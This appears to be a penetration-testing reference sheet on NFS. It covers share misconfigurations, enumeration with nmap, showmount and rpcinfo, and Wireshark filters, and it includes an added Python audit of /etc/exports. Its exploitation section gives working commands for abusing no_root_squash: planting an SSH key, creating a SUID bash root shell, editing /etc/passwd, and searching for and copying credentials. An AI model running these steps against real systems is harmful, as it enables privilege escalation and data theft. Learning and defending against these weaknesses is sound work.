Notes
| Ports |
|---|
| 2049 TCP/UDP (default) |
| 111 TCP/UDP (Portmapper/RPCbind) |
Service Description
NFS (Network File System) is a distributed file system protocol that lets a user on a client computer access files over a network much as they would access local storage. It relies on Remote Procedure Calls (RPC) and is commonly used in Unix/Linux environments for centralized file storage.
Warning
NFSv2 and NFSv3 have inherent security weaknesses, including reliance on the client to enforce access control (the server trusts the UID/GID the client asserts) and transmission of data in plaintext. NFSv4 introduced stronger security mechanisms such as Kerberos-based authentication and encryption.
Attacks
Misconfigured Share Permissions
Shares exported with weak permissions (no_root_squash, insecure, rw) allow remote users to access, modify, or create files with elevated (often root) privileges.
no_root_squash Vulnerability
If a share is exported with no_root_squash enabled, a remote root user on a client machine can create, modify, or access files as the root user on the NFS server, leading to trivial privilege escalation.
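As an added defender-side example (not part of the original notes), the following Python audit parses /etc/exports and flags the options called out above (no_root_squash, insecure, rw) plus any export with no host restriction; the sample exports file embedded in it is constructed, and the parser assumes the standard "path host(options) host(options)" layout.

```python
# Audit /etc/exports for the weak options named above (added example, not
# from the original notes). root_squash and secure are server defaults.
import re
import sys

WEAK_OPTIONS = {  # option -> risk it introduces
    "rw": "share is writable",
    "insecure": "accepts requests from unprivileged (>1024) source ports",
    "no_root_squash": "remote root is mapped to root on the server",
}

SAMPLE_EXPORTS = """\
# constructed sample file, not from any real host
/srv/share   10.0.0.0/24(rw,sync,no_root_squash)
/home        *(rw,insecure)
/var/backups 10.0.0.5(ro,root_squash)
/tmp
"""

def parse_exports(text):
    """Return (path, client, [options]) for every client spec in the file."""
    entries = []
    text = text.replace("\\\n", " ")  # join backslash continuations
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments
        if not line:
            continue
        parts = line.split(None, 1)
        tokens = parts[1].split() if len(parts) > 1 else ["*"]  # no hosts = any host
        for token in tokens:
            m = re.match(r"^([^(]*)(?:\((.*)\))?$", token)
            client = m.group(1) or "*"  # "(rw)" with no host also means any host
            opts = [o for o in (m.group(2) or "").split(",") if o]
            entries.append((parts[0], client, opts))
    return entries

def audit_exports(text):
    """Return (path, client, issue) findings in file order."""
    findings = []
    for path, client, opts in parse_exports(text):
        if client == "*":
            findings.append((path, client, "exported to every host"))
        for opt in opts:
            if opt in WEAK_OPTIONS:
                findings.append((path, client, f"{opt}: {WEAK_OPTIONS[opt]}"))
    return findings
if __name__ == "__main__":  # audit a real file: python3 audit.py /etc/exports
    src = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_EXPORTS
    for path, client, issue in audit_exports(src):
        print(f"{path:<14} {client:<14} {issue}")
```

Run it against a server's /etc/exports as part of a build or configuration review; on the constructed sample it reports six findings and nothing for /var/backups.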
Information Disclosure
Exported shares can expose sensitive information: user home directories, application configuration files, or backups.
Client-Side UID/GID Spoofing
An attacker can create a local user on their client machine with a specific UID/GID that matches a privileged user on the NFS server (e.g., root with UID 0). When mounting the share, they may inherit the permissions of that server-side user.
NFS Version Exploits
Older versions of NFS may be susceptible to specific vulnerabilities. While less common now, it's a potential vector on legacy systems.
Tools & Exploits
Enumeration
nmap
Discover NFS shares and RPC information.
# Basic NFS discovery
nmap -sV -p 111,2049 --script nfs-ls,nfs-showmount,nfs-statfs <target>
showmount
List exported filesystems from the target NFS server.
showmount -e <target>
rpcinfo
Query the RPCbind/Portmapper to identify registered RPC services, including NFS.
rpcinfo -p <target>
Exploitation or Post-Enum
Mounting an Exposed Share
Create a local directory and mount the remote NFS share.
mkdir /mnt/nfs_share
mount -t nfs <target>:<remote_share_path> /mnt/nfs_share
Common paths to try if unknown: /, /etc, /home, /var, /tmp
Exploiting no_root_squash
- On your attacker machine, switch to the root user (sudo su).
- Mount the NFS share as described above.
- Navigate into the mounted directory (cd /mnt/nfs_share). You now have root permissions on the remote file system.
- Common exploit primitives:
  - Add an SSH key: copy your public SSH key to /mnt/nfs_share/root/.ssh/authorized_keys.
  - Create a SUID binary:
    cp /bin/bash /mnt/nfs_share/tmp/rootshell
    chmod +s /mnt/nfs_share/tmp/rootshell
    Then, from a low-priv shell on the target, execute /tmp/rootshell -p to get a root shell.
  - Modify /etc/passwd: add a new user with UID 0. (Highly destructive, use with caution.)
File/Directory Manipulation
Once mounted, use standard Linux commands (ls -la, cat, find, grep) to search for sensitive data.
- Look for configuration files (.conf, .env, .xml) containing credentials.
- Search for SSH private keys (id_rsa), password files, or backups.
find /mnt/nfs_share -name "*.bak" -o -name "*.old"
grep -iR "password" /mnt/nfs_share
Data Exfiltration
Use cp or rsync to copy sensitive files from the mounted share to your local machine.
rsync -av /mnt/nfs_share/home/user/documents/ ./local_loot/
Wireshark Analysis Tips
Filters
nfs
rpc
portmapper
tcp.port == 2049 or udp.port == 2049
What to look for:
- MOUNT procedure calls to see which clients are mounting which shares.
- LOOKUP, READ, WRITE operations to identify file access patterns.
- Plaintext data in file transfers if NFSv2/v3 is in use.
- CREATE operations, especially for executable files or in sensitive system directories.